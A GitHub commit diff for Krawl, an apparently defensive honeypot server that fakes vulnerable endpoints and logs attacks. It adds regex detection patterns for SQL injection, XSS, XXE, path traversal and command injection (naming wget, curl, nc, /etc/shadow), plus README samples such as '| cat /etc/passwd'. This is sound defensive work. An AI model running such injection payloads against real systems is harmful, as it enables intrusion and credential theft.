Merge pull request #78 from BlessedRebuS/feat/raw-requests-attack-enanchements

added raw request handling, enanched attack detection for GET and POS…
This commit is contained in:
Patrick Di Fazio
2026-02-08 17:02:08 +01:00
committed by GitHub
26 changed files with 2312 additions and 867 deletions

View File

@@ -1,6 +0,0 @@
splitw -v -p 10
neww -n worker
select-window -t 1
select-pane -t 0
send-keys -t 0 "nvim" C-m
send-keys -t 1 "docker compose watch" C-m

View File

@@ -264,35 +264,51 @@ Below is a complete overview of the Krawl honeypots capabilities
The actual (juicy) robots.txt configuration [is the following](src/templates/html/robots.txt). The actual (juicy) robots.txt configuration [is the following](src/templates/html/robots.txt).
## Honeypot pages ## Honeypot pages
### Common Login Attempts
Requests to common admin endpoints (`/admin/`, `/wp-admin/`, `/phpMyAdmin/`) return a fake login page. Any login attempt triggers a 1-second delay to simulate real processing and is fully logged in the dashboard (credentials, IP, headers, timing). Requests to common admin endpoints (`/admin/`, `/wp-admin/`, `/phpMyAdmin/`) return a fake login page. Any login attempt triggers a 1-second delay to simulate real processing and is fully logged in the dashboard (credentials, IP, headers, timing).
![admin page](img/admin-page.png) ![admin page](img/admin-page.png)
### Common Misconfiguration Paths
Requests to paths like `/backup/`, `/config/`, `/database/`, `/private/`, or `/uploads/` return a fake directory listing populated with “interesting” files, each assigned a random file size to look realistic. Requests to paths like `/backup/`, `/config/`, `/database/`, `/private/`, or `/uploads/` return a fake directory listing populated with “interesting” files, each assigned a random file size to look realistic.
![directory-page](img/directory-page.png) ![directory-page](img/directory-page.png)
The `.env` endpoint exposes fake database connection strings, **AWS API keys**, and **Stripe secrets**. It intentionally returns an error due to the `Content-Type` being `application/json` instead of plain text, mimicking a “juicy” misconfiguration that crawlers and scanners often flag as information leakage. ### Environment File Leakage
The `.env` endpoint exposes fake database connection strings, **AWS API keys**, and **Stripe secrets**. It intentionally returns an error due to the `Content-Type` being `application/json` instead of plain text, mimicking a "juicy" misconfiguration that crawlers and scanners often flag as information leakage.
### Server Error Information
The `/server` page displays randomly generated fake error information for each known server. The `/server` page displays randomly generated fake error information for each known server.
![server and env page](img/server-and-env-page.png) ![server and env page](img/server-and-env-page.png)
### API Endpoints with Sensitive Data
The pages `/api/v1/users` and `/api/v2/secrets` show fake users and random secrets in JSON format The pages `/api/v1/users` and `/api/v2/secrets` show fake users and random secrets in JSON format
![users and secrets](img/users-and-secrets.png) ![users and secrets](img/users-and-secrets.png)
### Exposed Credential Files
The pages `/credentials.txt` and `/passwords.txt` show fake users and random secrets The pages `/credentials.txt` and `/passwords.txt` show fake users and random secrets
![credentials and passwords](img/credentials-and-passwords.png) ![credentials and passwords](img/credentials-and-passwords.png)
### SQL Injection and XSS Detection
Pages such as `/users`, `/search`, `/contact`, `/info`, `/input`, and `/feedback`, along with APIs like `/api/sql` and `/api/database`, are designed to lure attackers into performing attacks such as **SQL injection** or **XSS**. Pages such as `/users`, `/search`, `/contact`, `/info`, `/input`, and `/feedback`, along with APIs like `/api/sql` and `/api/database`, are designed to lure attackers into performing attacks such as **SQL injection** or **XSS**.
![sql injection](img/sql_injection.png) ![sql injection](img/sql_injection.png)
Automated tools like **SQLMap** will receive a different randomized database error on each request, increasing scan noise and confusing the attacker. All detected attacks are logged and displayed in the dashboard. Automated tools like **SQLMap** will receive a different randomized database error on each request, increasing scan noise and confusing the attacker. All detected attacks are logged and displayed in the dashboard.
### Path Traversal Detection
Krawl detects and responds to **path traversal** attempts targeting common system files like `/etc/passwd`, `/etc/shadow`, or Windows system paths. When an attacker tries to access sensitive files using patterns like `../../../etc/passwd` or encoded variants (`%2e%2e/`, `%252e`), Krawl returns convincing fake file contents with realistic system users, UIDs, GIDs, and shell configurations. This wastes attacker time while logging the full attack pattern.
### XXE (XML External Entity) Injection
The `/api/xml` and `/api/parser` endpoints accept XML input and are designed to detect **XXE injection** attempts. When attackers try to exploit external entity declarations (`<!ENTITY`, `<!DOCTYPE`, `SYSTEM`) or reference entities to access local files, Krawl responds with realistic XML responses that appear to process the entities successfully. The honeypot returns fake file contents, simulated entity values (like `admin_credentials` or `database_connection`), or realistic error messages, making the attack appear successful while fully logging the payload.
### Command Injection Detection
Pages like `/api/exec`, `/api/run`, and `/api/system` simulate command execution endpoints vulnerable to **command injection**. When attackers attempt to inject shell commands using patterns like `; whoami`, `| cat /etc/passwd`, or backticks, Krawl responds with realistic command outputs. For example, `whoami` returns fake usernames like `www-data` or `nginx`, while `uname` returns fake Linux kernel versions. Network commands like `wget` or `curl` simulate downloads or return "command not found" errors, creating believable responses that delay and confuse automated exploitation tools.
## Customizing the Canary Token ## Customizing the Canary Token
To create a custom canary token, visit https://canarytokens.org To create a custom canary token, visit https://canarytokens.org

View File

@@ -1,7 +1,7 @@
# Krawl Honeypot Configuration # Krawl Honeypot Configuration
server: server:
port: 5000 port: 1234
delay: 100 # Response delay in milliseconds delay: 100 # Response delay in milliseconds
# manually set the server header, if null a random one will be used. # manually set the server header, if null a random one will be used.

View File

@@ -2,8 +2,8 @@ apiVersion: v2
name: krawl-chart name: krawl-chart
description: A Helm chart for Krawl honeypot server description: A Helm chart for Krawl honeypot server
type: application type: application
version: 1.0.3 version: 1.0.4
appVersion: 1.0.3 appVersion: 1.0.4
keywords: keywords:
- honeypot - honeypot
- security - security

View File

@@ -312,6 +312,307 @@ wordlists:
- .git/ - .git/
- keys/ - keys/
- credentials/ - credentials/
fake_files:
- name: settings.conf
size_min: 1024
size_max: 8192
perms: "-rw-r--r--"
- name: database.sql
size_min: 10240
size_max: 102400
perms: "-rw-r--r--"
- name: .htaccess
size_min: 256
size_max: 1024
perms: "-rw-r--r--"
- name: README.md
size_min: 512
size_max: 2048
perms: "-rw-r--r--"
fake_directories:
- name: config
size: "4096"
perms: drwxr-xr-x
- name: backup
size: "4096"
perms: drwxr-xr-x
- name: logs
size: "4096"
perms: drwxrwxr-x
- name: data
size: "4096"
perms: drwxr-xr-x
fake_passwd:
system_users:
- "root:x:0:0:root:/root:/bin/bash"
- "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"
- "bin:x:2:2:bin:/bin:/usr/sbin/nologin"
- "sys:x:3:3:sys:/dev:/usr/sbin/nologin"
- "sync:x:4:65534:sync:/bin:/bin/sync"
- "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
- "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin"
- "mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false"
- "sshd:x:109:65534::/run/sshd:/usr/sbin/nologin"
uid_min: 1000
uid_max: 2000
gid_min: 1000
gid_max: 2000
shells:
- /bin/bash
- /bin/sh
- /usr/bin/zsh
fake_shadow:
system_entries:
- "root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::"
- "daemon:*:19000:0:99999:7:::"
- "bin:*:19000:0:99999:7:::"
- "sys:*:19000:0:99999:7:::"
- "www-data:*:19000:0:99999:7:::"
hash_prefix: "$6$rounds=656000$"
salt_length: 16
hash_length: 86
xxe_responses:
file_access:
template: |
<?xml version="1.0"?>
<response>
<status>success</status>
<data>{content}</data>
</response>
entity_processed:
template: |
<?xml version="1.0"?>
<response>
<status>success</status>
<message>Entity processed successfully</message>
<entity_value>{entity_value}</entity_value>
</response>
entity_values:
- "admin_credentials"
- "database_connection"
- "api_secret_key"
- "internal_server_ip"
- "encrypted_password"
error:
template: |
<?xml version="1.0"?>
<response>
<status>error</status>
<message>{message}</message>
</response>
messages:
- "External entity not allowed"
- "XML parsing error"
- "Invalid entity reference"
default_content: "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
command_outputs:
id:
- "uid={uid}(www-data) gid={gid}(www-data) groups={gid}(www-data)"
- "uid={uid}(nginx) gid={gid}(nginx) groups={gid}(nginx)"
- "uid={uid}(apache) gid={gid}(apache) groups={gid}(apache)"
whoami:
- www-data
- nginx
- apache
- webapp
- nobody
uname:
- "Linux webserver 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux"
- "Linux app-server 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 GNU/Linux"
- "Linux prod-server 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux"
pwd:
- /var/www/html
- /home/webapp/public_html
- /usr/share/nginx/html
- /opt/app/public
ls:
- ["index.php", "config.php", "uploads", "assets", "README.md", ".htaccess", "admin"]
- ["app.js", "package.json", "node_modules", "public", "views", "routes"]
- ["index.html", "css", "js", "images", "data", "api"]
cat_config: |
<?php
// Configuration file
$db_host = 'localhost';
$db_user = 'webapp';
$db_pass = 'fake_password';
?>
network_commands:
- "bash: wget: command not found"
- "curl: (6) Could not resolve host: example.com"
- "Connection timeout"
- "bash: nc: command not found"
- "Downloaded {size} bytes"
generic:
- "sh: 1: syntax error: unexpected end of file"
- "Command executed successfully"
- ""
- "/bin/sh: {num}: not found"
- "bash: command not found"
uid_min: 1000
uid_max: 2000
gid_min: 1000
gid_max: 2000
download_size_min: 100
download_size_max: 10000
sql_errors:
mysql:
syntax_errors:
- "You have an error in your SQL syntax"
- "check the manual that corresponds to your MySQL server version"
table_errors:
- "Table '{table}' doesn't exist"
- "Unknown table '{table}'"
column_errors:
- "Unknown column '{column}' in 'field list'"
- "Unknown column '{column}' in 'where clause'"
postgresql:
syntax_errors:
- "ERROR: syntax error at or near"
- "ERROR: unterminated quoted string"
relation_errors:
- "ERROR: relation \"{table}\" does not exist"
column_errors:
- "ERROR: column \"{column}\" does not exist"
mssql:
syntax_errors:
- "Incorrect syntax near"
- "Unclosed quotation mark"
object_errors:
- "Invalid object name '{table}'"
column_errors:
- "Invalid column name '{column}'"
oracle:
syntax_errors:
- "ORA-00933: SQL command not properly ended"
- "ORA-00904: invalid identifier"
table_errors:
- "ORA-00942: table or view does not exist"
sqlite:
syntax_errors:
- "near \"{token}\": syntax error"
table_errors:
- "no such table: {table}"
column_errors:
- "no such column: {column}"
mongodb:
query_errors:
- "Failed to parse"
- "unknown operator"
collection_errors:
- "ns not found"
server_errors:
nginx:
versions:
- "1.18.0"
- "1.20.1"
- "1.22.0"
- "1.24.0"
template: |
<!DOCTYPE html>
<html>
<head>
<title>{code} {message}</title>
<style>
body {{
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}}
</style>
</head>
<body>
<h1>An error occurred.</h1>
<p>Sorry, the page you are looking for is currently unavailable.<br/>
Please try again later.</p>
<p>If you are the system administrator of this resource then you should check the error log for details.</p>
<p><em>Faithfully yours, nginx/{version}.</em></p>
</body>
</html>
apache:
versions:
- "2.4.41"
- "2.4.52"
- "2.4.54"
- "2.4.57"
os:
- Ubuntu
- Debian
- CentOS
template: |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>{code} {message}</title>
</head><body>
<h1>{message}</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/{version} ({os}) Server at {host} Port 80</address>
</body></html>
iis:
versions:
- "10.0"
- "8.5"
- "8.0"
template: |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>{code} - {message}</title>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<h2>{code} - {message}</h2>
<h3>The page cannot be displayed because an internal server error has occurred.</h3>
</div>
</body>
</html>
attack_patterns:
path_traversal: "(\\.\\.| %2e%2e|%252e|/etc/passwd|/etc/shadow|\\.\\.\\\\/|\\.\\./|/windows/system32|c:\\\\windows|/proc/self|\\.\\.\\.%2f|\\.\\.\\.%5c|etc/passwd|etc/shadow)"
sql_injection: "('|\"|`|--|#|/\\*|\\*/|\\bunion\\b|\\bunion\\s+select\\b|\\bor\\b.*=.*|\\band\\b.*=.*|'.*or.*'.*=.*'|\\bsleep\\b|\\bwaitfor\\b|\\bdelay\\b|\\bbenchmark\\b|;.*select|;.*drop|;.*insert|;.*update|;.*delete|\\bexec\\b|\\bexecute\\b|\\bxp_cmdshell\\b|information_schema|table_schema|table_name)"
xss_attempt: "(<script|</script|javascript:|onerror=|onload=|onclick=|onmouseover=|onfocus=|onblur=|<iframe|<img|<svg|<embed|<object|<body|<input|eval\\(|alert\\(|prompt\\(|confirm\\(|document\\.|window\\.|<style|expression\\(|vbscript:|data:text/html)"
lfi_rfi: "(file://|php://|expect://|data://|zip://|phar://|/etc/passwd|/etc/shadow|/proc/self|c:\\\\windows)"
xxe_injection: "(<!ENTITY|<!DOCTYPE|SYSTEM\\s+[\"']|PUBLIC\\s+[\"']|&\\w+;|file://|php://filter|expect://)"
ldap_injection: "(\\*\\)|\\(\\||\\(&)"
command_injection: "(cmd=|exec=|command=|execute=|system=|ping=|host=|&&|\\|\\||;|\\$\\{|\\$\\(|`|\\bid\\b|\\bwhoami\\b|\\buname\\b|\\bcat\\b|\\bls\\b|\\bpwd\\b|\\becho\\b|\\bwget\\b|\\bcurl\\b|\\bnc\\b|\\bnetcat\\b|\\bbash\\b|\\bsh\\b|\\bps\\b|\\bkill\\b|\\bchmod\\b|\\bchown\\b|\\bcp\\b|\\bmv\\b|\\brm\\b|/bin/bash|/bin/sh|cmd\\.exe|/bin/|/usr/bin/|/sbin/)"
suspicious_patterns:
- bot
- crawler
- spider
- scraper
- curl
- wget
- python-requests
- scanner
- nikto
- sqlmap
- nmap
- masscan
- nessus
- acunetix
- burp
- zap
- w3af
- metasploit
- nuclei
- gobuster
- dirbuster
credential_fields:
username_fields:
- username
- user
- login
- email
- log
- userid
- account
password_fields:
- password
- pass
- passwd
- pwd
- passphrase
server_headers: server_headers:
- Apache/2.2.22 (Ubuntu) - Apache/2.2.22 (Ubuntu)
- nginx/1.18.0 - nginx/1.18.0

View File

@@ -1,342 +0,0 @@
#!/usr/bin/env python3
from sqlalchemy import select
from typing import Optional
from database import get_database, DatabaseManager
from zoneinfo import ZoneInfo
from pathlib import Path
from datetime import datetime, timedelta
import re
import urllib.parse
from wordlists import get_wordlists
from config import get_config
from logger import get_app_logger
import requests
"""
Functions for user activity analysis
"""
app_logger = get_app_logger()
class Analyzer:
"""
Analyzes users activity and produces aggregated insights
"""
def __init__(self, db_manager: Optional[DatabaseManager] = None):
"""
Initialize the analyzer.
Args:
db_manager: Optional DatabaseManager for persistence.
If None, will use the global singleton.
"""
self._db_manager = db_manager
@property
def db(self) -> Optional[DatabaseManager]:
"""
Get the database manager, lazily initializing if needed.
Returns:
DatabaseManager instance or None if not available
"""
if self._db_manager is None:
try:
self._db_manager = get_database()
except Exception:
pass
return self._db_manager
# def infer_user_category(self, ip: str) -> str:
# config = get_config()
# http_risky_methods_threshold = config.http_risky_methods_threshold
# violated_robots_threshold = config.violated_robots_threshold
# uneven_request_timing_threshold = config.uneven_request_timing_threshold
# user_agents_used_threshold = config.user_agents_used_threshold
# attack_urls_threshold = config.attack_urls_threshold
# uneven_request_timing_time_window_seconds = config.uneven_request_timing_time_window_seconds
# app_logger.debug(f"http_risky_methods_threshold: {http_risky_methods_threshold}")
# score = {}
# score["attacker"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False}
# score["good_crawler"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False}
# score["bad_crawler"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False}
# score["regular_user"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False}
# #1-3 low, 4-6 mid, 7-9 high, 10-20 extreme
# weights = {
# "attacker": {
# "risky_http_methods": 6,
# "robots_violations": 4,
# "uneven_request_timing": 3,
# "different_user_agents": 8,
# "attack_url": 15
# },
# "good_crawler": {
# "risky_http_methods": 1,
# "robots_violations": 0,
# "uneven_request_timing": 0,
# "different_user_agents": 0,
# "attack_url": 0
# },
# "bad_crawler": {
# "risky_http_methods": 2,
# "robots_violations": 7,
# "uneven_request_timing": 0,
# "different_user_agents": 5,
# "attack_url": 5
# },
# "regular_user": {
# "risky_http_methods": 0,
# "robots_violations": 0,
# "uneven_request_timing": 8,
# "different_user_agents": 3,
# "attack_url": 0
# }
# }
# accesses = self.db.get_access_logs(ip_filter = ip, limit=1000)
# total_accesses_count = len(accesses)
# if total_accesses_count <= 0:
# return
# # Set category as "unknown" for the first 5 requests
# if total_accesses_count < 3:
# category = "unknown"
# analyzed_metrics = {}
# category_scores = {"attacker": 0, "good_crawler": 0, "bad_crawler": 0, "regular_user": 0, "unknown": 0}
# last_analysis = datetime.now(tz=ZoneInfo('UTC'))
# self._db_manager.update_ip_stats_analysis(ip, analyzed_metrics, category, category_scores, last_analysis)
# return 0
# #--------------------- HTTP Methods ---------------------
# get_accesses_count = len([item for item in accesses if item["method"] == "GET"])
# post_accesses_count = len([item for item in accesses if item["method"] == "POST"])
# put_accesses_count = len([item for item in accesses if item["method"] == "PUT"])
# delete_accesses_count = len([item for item in accesses if item["method"] == "DELETE"])
# head_accesses_count = len([item for item in accesses if item["method"] == "HEAD"])
# options_accesses_count = len([item for item in accesses if item["method"] == "OPTIONS"])
# patch_accesses_count = len([item for item in accesses if item["method"] == "PATCH"])
# if total_accesses_count > http_risky_methods_threshold:
# http_method_attacker_score = (post_accesses_count + put_accesses_count + delete_accesses_count + options_accesses_count + patch_accesses_count) / total_accesses_count
# else:
# http_method_attacker_score = 0
# #print(f"HTTP Method attacker score: {http_method_attacker_score}")
# if http_method_attacker_score >= http_risky_methods_threshold:
# score["attacker"]["risky_http_methods"] = True
# score["good_crawler"]["risky_http_methods"] = False
# score["bad_crawler"]["risky_http_methods"] = True
# score["regular_user"]["risky_http_methods"] = False
# else:
# score["attacker"]["risky_http_methods"] = False
# score["good_crawler"]["risky_http_methods"] = True
# score["bad_crawler"]["risky_http_methods"] = False
# score["regular_user"]["risky_http_methods"] = False
# #--------------------- Robots Violations ---------------------
# #respect robots.txt and login/config pages access frequency
# robots_disallows = []
# robots_path = Path(__file__).parent / "templates" / "html" / "robots.txt"
# with open(robots_path, "r") as f:
# for line in f:
# line = line.strip()
# if not line:
# continue
# parts = line.split(":")
# if parts[0] == "Disallow":
# parts[1] = parts[1].rstrip("/")
# #print(f"DISALLOW {parts[1]}")
# robots_disallows.append(parts[1].strip())
# #if 0 100% sure is good crawler, if >10% of robots violated is bad crawler or attacker
# violated_robots_count = len([item for item in accesses if any(item["path"].rstrip("/").startswith(disallow) for disallow in robots_disallows)])
# #print(f"Violated robots count: {violated_robots_count}")
# if total_accesses_count > 0:
# violated_robots_ratio = violated_robots_count / total_accesses_count
# else:
# violated_robots_ratio = 0
# if violated_robots_ratio >= violated_robots_threshold:
# score["attacker"]["robots_violations"] = True
# score["good_crawler"]["robots_violations"] = False
# score["bad_crawler"]["robots_violations"] = True
# score["regular_user"]["robots_violations"] = False
# else:
# score["attacker"]["robots_violations"] = False
# score["good_crawler"]["robots_violations"] = False
# score["bad_crawler"]["robots_violations"] = False
# score["regular_user"]["robots_violations"] = False
# #--------------------- Requests Timing ---------------------
# #Request rate and timing: steady, throttled, polite vs attackers' bursty, aggressive, or oddly rhythmic behavior
# timestamps = [datetime.fromisoformat(item["timestamp"]) for item in accesses]
# now_utc = datetime.now(tz=ZoneInfo('UTC'))
# timestamps = [ts for ts in timestamps if now_utc - ts <= timedelta(seconds=uneven_request_timing_time_window_seconds)]
# timestamps = sorted(timestamps, reverse=True)
# time_diffs = []
# for i in range(0, len(timestamps)-1):
# diff = (timestamps[i] - timestamps[i+1]).total_seconds()
# time_diffs.append(diff)
# mean = 0
# variance = 0
# std = 0
# cv = 0
# if time_diffs:
# mean = sum(time_diffs) / len(time_diffs)
# variance = sum((x - mean) ** 2 for x in time_diffs) / len(time_diffs)
# std = variance ** 0.5
# cv = std/mean
# app_logger.debug(f"Mean: {mean} - Variance {variance} - Standard Deviation {std} - Coefficient of Variation: {cv}")
# if cv >= uneven_request_timing_threshold:
# score["attacker"]["uneven_request_timing"] = True
# score["good_crawler"]["uneven_request_timing"] = False
# score["bad_crawler"]["uneven_request_timing"] = False
# score["regular_user"]["uneven_request_timing"] = True
# else:
# score["attacker"]["uneven_request_timing"] = False
# score["good_crawler"]["uneven_request_timing"] = False
# score["bad_crawler"]["uneven_request_timing"] = False
# score["regular_user"]["uneven_request_timing"] = False
# #--------------------- Different User Agents ---------------------
# #Header Quality and Consistency: Crawlers tend to use complete and consistent headers, attackers might miss, fake, or change headers
# user_agents_used = [item["user_agent"] for item in accesses]
# user_agents_used = list(dict.fromkeys(user_agents_used))
# #print(f"User agents used: {user_agents_used}")
# if len(user_agents_used) >= user_agents_used_threshold:
# score["attacker"]["different_user_agents"] = True
# score["good_crawler"]["different_user_agents"] = False
# score["bad_crawler"]["different_user_agentss"] = True
# score["regular_user"]["different_user_agents"] = False
# else:
# score["attacker"]["different_user_agents"] = False
# score["good_crawler"]["different_user_agents"] = False
# score["bad_crawler"]["different_user_agents"] = False
# score["regular_user"]["different_user_agents"] = False
# #--------------------- Attack URLs ---------------------
# attack_urls_found_list = []
# wl = get_wordlists()
# if wl.attack_patterns:
# queried_paths = [item["path"] for item in accesses]
# for queried_path in queried_paths:
# # URL decode the path to catch encoded attacks
# try:
# decoded_path = urllib.parse.unquote(queried_path)
# # Double decode to catch double-encoded attacks
# decoded_path_twice = urllib.parse.unquote(decoded_path)
# except Exception:
# decoded_path = queried_path
# decoded_path_twice = queried_path
# for name, pattern in wl.attack_patterns.items():
# # Check original, decoded, and double-decoded paths
# if (re.search(pattern, queried_path, re.IGNORECASE) or
# re.search(pattern, decoded_path, re.IGNORECASE) or
# re.search(pattern, decoded_path_twice, re.IGNORECASE)):
# attack_urls_found_list.append(f"{name}: {pattern}")
# #remove duplicates
# attack_urls_found_list = set(attack_urls_found_list)
# attack_urls_found_list = list(attack_urls_found_list)
# if len(attack_urls_found_list) > attack_urls_threshold:
# score["attacker"]["attack_url"] = True
# score["good_crawler"]["attack_url"] = False
# score["bad_crawler"]["attack_url"] = False
# score["regular_user"]["attack_url"] = False
# else:
# score["attacker"]["attack_url"] = False
# score["good_crawler"]["attack_url"] = False
# score["bad_crawler"]["attack_url"] = False
# score["regular_user"]["attack_url"] = False
# #--------------------- Calculate score ---------------------
# attacker_score = good_crawler_score = bad_crawler_score = regular_user_score = 0
# attacker_score = score["attacker"]["risky_http_methods"] * weights["attacker"]["risky_http_methods"]
# attacker_score = attacker_score + score["attacker"]["robots_violations"] * weights["attacker"]["robots_violations"]
# attacker_score = attacker_score + score["attacker"]["uneven_request_timing"] * weights["attacker"]["uneven_request_timing"]
# attacker_score = attacker_score + score["attacker"]["different_user_agents"] * weights["attacker"]["different_user_agents"]
# attacker_score = attacker_score + score["attacker"]["attack_url"] * weights["attacker"]["attack_url"]
# good_crawler_score = score["good_crawler"]["risky_http_methods"] * weights["good_crawler"]["risky_http_methods"]
# good_crawler_score = good_crawler_score + score["good_crawler"]["robots_violations"] * weights["good_crawler"]["robots_violations"]
# good_crawler_score = good_crawler_score + score["good_crawler"]["uneven_request_timing"] * weights["good_crawler"]["uneven_request_timing"]
# good_crawler_score = good_crawler_score + score["good_crawler"]["different_user_agents"] * weights["good_crawler"]["different_user_agents"]
# good_crawler_score = good_crawler_score + score["good_crawler"]["attack_url"] * weights["good_crawler"]["attack_url"]
# bad_crawler_score = score["bad_crawler"]["risky_http_methods"] * weights["bad_crawler"]["risky_http_methods"]
# bad_crawler_score = bad_crawler_score + score["bad_crawler"]["robots_violations"] * weights["bad_crawler"]["robots_violations"]
# bad_crawler_score = bad_crawler_score + score["bad_crawler"]["uneven_request_timing"] * weights["bad_crawler"]["uneven_request_timing"]
# bad_crawler_score = bad_crawler_score + score["bad_crawler"]["different_user_agents"] * weights["bad_crawler"]["different_user_agents"]
# bad_crawler_score = bad_crawler_score + score["bad_crawler"]["attack_url"] * weights["bad_crawler"]["attack_url"]
# regular_user_score = score["regular_user"]["risky_http_methods"] * weights["regular_user"]["risky_http_methods"]
# regular_user_score = regular_user_score + score["regular_user"]["robots_violations"] * weights["regular_user"]["robots_violations"]
# regular_user_score = regular_user_score + score["regular_user"]["uneven_request_timing"] * weights["regular_user"]["uneven_request_timing"]
# regular_user_score = regular_user_score + score["regular_user"]["different_user_agents"] * weights["regular_user"]["different_user_agents"]
# regular_user_score = regular_user_score + score["regular_user"]["attack_url"] * weights["regular_user"]["attack_url"]
# score_details = f"""
# Attacker score: {attacker_score}
# Good Crawler score: {good_crawler_score}
# Bad Crawler score: {bad_crawler_score}
# Regular User score: {regular_user_score}
# """
# app_logger.debug(score_details)
# analyzed_metrics = {"risky_http_methods": http_method_attacker_score, "robots_violations": violated_robots_ratio, "uneven_request_timing": mean, "different_user_agents": user_agents_used, "attack_url": attack_urls_found_list}
# category_scores = {"attacker": attacker_score, "good_crawler": good_crawler_score, "bad_crawler": bad_crawler_score, "regular_user": regular_user_score}
# category = max(category_scores, key=category_scores.get)
# last_analysis = datetime.now(tz=ZoneInfo('UTC'))
# self._db_manager.update_ip_stats_analysis(ip, analyzed_metrics, category, category_scores, last_analysis)
# return 0
# def update_ip_rep_infos(self, ip: str) -> list[str]:
# api_url = "https://iprep.lcrawl.com/api/iprep/"
# params = {
# "cidr": ip
# }
# headers = {
# "Content-Type": "application/json"
# }
# response = requests.get(api_url, headers=headers, params=params)
# payload = response.json()
# if payload["results"]:
# data = payload["results"][0]
# country_iso_code = data["geoip_data"]["country_iso_code"]
# asn = data["geoip_data"]["asn_autonomous_system_number"]
# asn_org = data["geoip_data"]["asn_autonomous_system_organization"]
# list_on = data["list_on"]
# sanitized_country_iso_code = sanitize_for_storage(country_iso_code, 3)
# sanitized_asn = sanitize_for_storage(asn, 100)
# sanitized_asn_org = sanitize_for_storage(asn_org, 100)
# sanitized_list_on = sanitize_dict(list_on, 100000)
# self._db_manager.update_ip_rep_infos(ip, sanitized_country_iso_code, sanitized_asn, sanitized_asn_org, sanitized_list_on)
# return

View File

@@ -207,6 +207,7 @@ class DatabaseManager:
is_honeypot_trigger: bool = False, is_honeypot_trigger: bool = False,
attack_types: Optional[List[str]] = None, attack_types: Optional[List[str]] = None,
matched_patterns: Optional[Dict[str, str]] = None, matched_patterns: Optional[Dict[str, str]] = None,
raw_request: Optional[str] = None,
) -> Optional[int]: ) -> Optional[int]:
""" """
Persist an access log entry to the database. Persist an access log entry to the database.
@@ -220,6 +221,7 @@ class DatabaseManager:
is_honeypot_trigger: Whether a honeypot path was accessed is_honeypot_trigger: Whether a honeypot path was accessed
attack_types: List of detected attack types attack_types: List of detected attack types
matched_patterns: Dict mapping attack_type to matched pattern matched_patterns: Dict mapping attack_type to matched pattern
raw_request: Full raw HTTP request for forensic analysis
Returns: Returns:
The ID of the created AccessLog record, or None on error The ID of the created AccessLog record, or None on error
@@ -235,6 +237,7 @@ class DatabaseManager:
is_suspicious=is_suspicious, is_suspicious=is_suspicious,
is_honeypot_trigger=is_honeypot_trigger, is_honeypot_trigger=is_honeypot_trigger,
timestamp=datetime.now(), timestamp=datetime.now(),
raw_request=raw_request,
) )
session.add(access_log) session.add(access_log)
session.flush() # Get the ID before committing session.flush() # Get the ID before committing
@@ -1606,7 +1609,10 @@ class DatabaseManager:
sort_order.lower() if sort_order.lower() in {"asc", "desc"} else "desc" sort_order.lower() if sort_order.lower() in {"asc", "desc"} else "desc"
) )
# Get all access logs with attack detections # Count total attacks first (efficient)
total_attacks = session.query(AccessLog).join(AttackDetection).count()
# Get paginated access logs with attack detections
query = session.query(AccessLog).join(AttackDetection) query = session.query(AccessLog).join(AttackDetection)
if sort_by == "timestamp": if sort_by == "timestamp":
@@ -1619,30 +1625,27 @@ class DatabaseManager:
query = query.order_by( query = query.order_by(
AccessLog.ip.desc() if sort_order == "desc" else AccessLog.ip.asc() AccessLog.ip.desc() if sort_order == "desc" else AccessLog.ip.asc()
) )
# Note: attack_type sorting requires loading all data, so we skip it for performance
# elif sort_by == "attack_type":
# Can't efficiently sort by related table field
logs = query.all() # Apply LIMIT and OFFSET at database level
logs = query.offset(offset).limit(page_size).all()
# Convert to attack list # Convert to attack list (exclude raw_request for performance - it's too large)
attack_list = [ paginated = [
{ {
"id": log.id,
"ip": log.ip, "ip": log.ip,
"path": log.path, "path": log.path,
"user_agent": log.user_agent, "user_agent": log.user_agent,
"timestamp": log.timestamp.isoformat() if log.timestamp else None, "timestamp": log.timestamp.isoformat() if log.timestamp else None,
"attack_types": [d.attack_type for d in log.attack_detections], "attack_types": [d.attack_type for d in log.attack_detections],
"raw_request": log.raw_request, # Keep for backward compatibility
} }
for log in logs for log in logs
] ]
# Sort by attack_type if needed (this must be done post-fetch since it's in a related table)
if sort_by == "attack_type":
attack_list.sort(
key=lambda x: x["attack_types"][0] if x["attack_types"] else "",
reverse=(sort_order == "desc"),
)
total_attacks = len(attack_list)
paginated = attack_list[offset : offset + page_size]
total_pages = (total_attacks + page_size - 1) // page_size total_pages = (total_attacks + page_size - 1) // page_size
return { return {
@@ -1657,6 +1660,60 @@ class DatabaseManager:
finally: finally:
self.close_session() self.close_session()
def get_raw_request_by_id(self, log_id: int) -> Optional[str]:
"""
Retrieve raw HTTP request for a specific access log ID.
Args:
log_id: The access log ID
Returns:
The raw request string, or None if not found or not available
"""
session = self.session
try:
access_log = session.query(AccessLog).filter(AccessLog.id == log_id).first()
if access_log:
return access_log.raw_request
return None
finally:
self.close_session()
